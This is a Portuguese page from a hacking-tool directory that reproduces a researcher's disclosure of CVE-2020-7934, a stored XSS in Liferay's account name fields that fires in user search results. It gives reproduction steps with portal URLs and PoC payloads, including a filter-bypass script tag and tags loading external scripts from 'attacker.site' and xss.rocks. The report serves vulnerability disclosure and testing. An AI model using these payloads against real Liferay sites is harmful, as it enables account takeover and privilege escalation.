Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 — XSS Armazenado Autenticado no LifeRay 7.2.0 GA1 via MyAccountPortlet executado pelos Resultados da Pesquisa | Kitploit
Ferramentas/GitHubGitHub/3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHub3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934

liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

XSS Armazenado Autenticado no LifeRay 7.2.0 GA1 via MyAccountPortlet executado pelos Resultados da Pesquisa

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
613há 5 anosAinda não revisado

XSS Armazenado Autenticado no LifeRay 7.2.1 GA2 via MyAccountPortlet executado pelos Resultados da Pesquisa

Nas versões do LifeRay 7.1.0 até 7.2.1 GA2, os campos Primeiro Nome, Nome do Meio e Sobrenome das contas de usuário são vulneráveis a um problema de XSS Armazenado. Qualquer usuário pode modificar esses campos com um payload XSS específico e ele será armazenado no banco de dados "infectando" o usuário. O payload será então renderizado quando um usuário utilizar o recurso de pesquisa para buscar outros usuários. Se o usuário infectado for exibido como resultado da pesquisa, o payload XSS será executado.

  • Autor/Pesquisador: Casey Erdmann
  • Data da Descoberta: 10/17/2019
  • Última Revisão: 10/05/2020
  • Divulgação Privada: 10/18/2019
  • Divulgação Pública: 01/27/2020 (Postagem no Blog)
  • Lançamento Corrigido: 01/30/2020 Liferay Portal 7.3.0 GA1
  • Lançamento da Prova de Conceito: 10/05/2020

Impacto

Esta vulnerabilidade permite que um atacante execute código arbitrário no contexto de qualquer usuário que acione o payload XSS por meio da pesquisa. Em um sentido prático, isso pode levar à escalada de privilégios de um usuário não privilegiado para um usuário administrador, bem como a movimentação lateral na tomada de outras contas. Além disso, qualquer coisa que possa ser executada via JavaScript pode ser explorada no contexto de outro usuário.

Como você verá na Prova de Conceito (PoC), isso está totalmente aberto, pois o atacante tem a capacidade de carregar scripts externos com facilidade em um contexto padrão.

A maioria dos Cookies de Sessão importantes são sinalizados como HTTPOnly, o que impede principalmente técnicas simples de sequestro de sessão. Dito isso, deve-se notar que os usuários que visualizam a página com navegadores mais antigos são ainda mais impactados por isso, graças aos ataques XST.

Como os usuários administradores podem executar comandos Gogo Shell e Groovy Script, também pode ser possível encadear essa exploração com esses recursos normalmente pretendidos para obter RCE não intencional no sistema host, partindo de um usuário não privilegiado.

Passos para Reproduzir

Para que essa vulnerabilidade seja acionada, duas condições devem ser atendidas:

  1. Você deve ter acesso a uma conta de usuário na qual possa modificar os campos Primeiro Nome, Nome do Meio ou Sobrenome.
  2. Seu usuário deve ser pesquisável no LifeRay. Normalmente, isso significa apenas que ele precisa ser adicionado a um site. Por padrão, um usuário pode se adicionar ao site base, o que significa que pode se tornar pesquisável sem autorização adicional.

Uma vez que essas condições sejam atendidas, os seguintes passos podem ser observados para explorar a vulnerabilidade:

  1. Faça login como o usuário ao qual você tem acesso
  2. Navegue até a seção Account Settings
    • Clique no ícone do Perfil > Account Settings
    • A URL deve ser algo como: http://mysite.com/user/hacker/manage?p_p_id=com_liferay_my_account_web_portlet_MyAccountPortlet&p_p_lifecycle=0&p_p_auth=??????
  3. Modifique os campos Primeiro Nome, Nome do Meio ou Sobrenome no formulário com seu payload XSS (veja exemplos de PoC abaixo) e clique em Save
  4. Se você ainda não estiver em um site, pode entrar em um navegando até http://mysite.com/user/hacker/home/-/my_sites/sites/available-sites?_com_liferay_site_my_sites_web_portlet_MySitesPortlet_displayStyle=descriptive e clique no ícone de "três pontos" no lado direito e selecione join.
  5. Pesquise por seu usuário para acionar o payload XSS: http://mysite.com/web/guest/search?q=<my user>
    • Para teste, demonstrando o impacto em outro usuário:
      • Faça login como um segundo usuário, pesquise pelo "usuário infectado" e o payload XSS será executado também no contexto dele.

PoC Alerta Simples

  • <<SCRIPT>alert("XSS");//<</SCRIPT>

PoC Script Externo e Bypass de Filtro

  • <SCRIPT SRC="//attacker.site/payload.js">
  • Tente demonstrar com xss.rocks!
    • <SCRIPT SRC="//xss.rocks/xss.js"/>

Versão do relatório 4.0

Baixar ferramenta